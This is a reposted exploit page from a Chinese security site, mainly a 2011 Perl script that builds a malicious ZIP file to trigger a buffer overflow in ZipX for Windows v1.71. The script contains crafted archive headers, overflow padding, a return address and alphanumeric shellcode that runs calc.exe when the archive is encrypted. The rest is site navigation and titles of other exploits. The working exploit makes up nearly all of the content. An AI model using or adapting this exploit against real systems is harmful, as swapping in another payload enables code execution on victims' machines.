首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
来源:http://net-fuzzer.blogspot.com 作者:G0M3S 发布时间:2011-09-06  

#!/usr/bin/perl
#
#[+]Exploit Title: ZipX for Windows v1.71 ZIP File Buffer Overflow Exploit
#[+]Date: 05\09\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipX/3000-2250_4-10518937.html
#[+]Version: v1.71
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
#Reproduce:
#Open the zip file, after click in "Encrypt", type you password and click in "Ok" BOOM!!!
#See the calc.exe
#


use strict;
use warnings;

my $filename = "Exploit.zip";

print "\n\n\t\tZipX for Windows v1.71 ZIP File Buffer Overflow Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail louredo_\@hotmail.com\n";
print "\t\tSite http://net-fuzzer.blogspot.com/\n\n";
sleep(1);

print "\t\t[+]Creating ZIP File...\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";

my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";

my $shellcode =
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUK" .
"VPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMM" .
"PV261UKL71ME2NMP7FQY0NOHKPKZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7Z" . # Shellcode WinExec "calc.exe"
"UXDDXZSOMKL4SQKUNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWW" . # Alpha Numeric Shellcode BaseAddress EAX
"LNG6LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15XUXYUNP1" .
"BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWNKRKJ8JSNS4YMMOHT3Z" .
"QJOHQ4QJUQLN1VSLV5S1QYO0YA";
my $payload = "A" x 330;
$payload .=
("\x66\x05\x4D\xCD" x 4).
"\x66\x05\x19\x18". # ADD AX,1819
"\x54\x5A\x50\x5B". # PUSH ESP # POP EDX # PUSH EAX # POP EBX
"\x2B\xE0". # Afer convertion SUB EDX,EBX
"\x52\x58". # PUSH EDX # POP EAX
"\x98\xd1"; # CALL EAX
$payload .= "C" x (371-length($payload));
$payload .= "\x3C\x01\x75\xd1"; # Converted is that "\x3c\x04\x75\xd0"
$payload .= pack('V',0x0041334d); # P/P/RET
$payload .= $shellcode;
$payload .= "B" x (4064-length($payload));
$payload = $payload.".rar";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "\t\t[-]Error:\n$!\n";
print FILE $zip;
close(FILE);
print "\t\t[+] ZIP File Created With Sucess:)\n";
sleep(3);

 
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·World Of Warcraft Local Stack
·TOWeb V3 Local Format String D
·CoolPlayer Portable 2.19.2 Buf
·Linux Kernel < 2.6.36.2 Econet
·Sound Editor Local Buffer Over
·DVD X Player 5.5 Pro SEH Overw
·XFtp_client Remote Buffer Over
·Mp3 Audio Editor Local Buffer
·AD Sound Recorder Local Buffer
·Bison FTP Server v3.5 Multiple
·Crush FTP 5 'APPE' command Rem
·Desktop Recorder Local Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved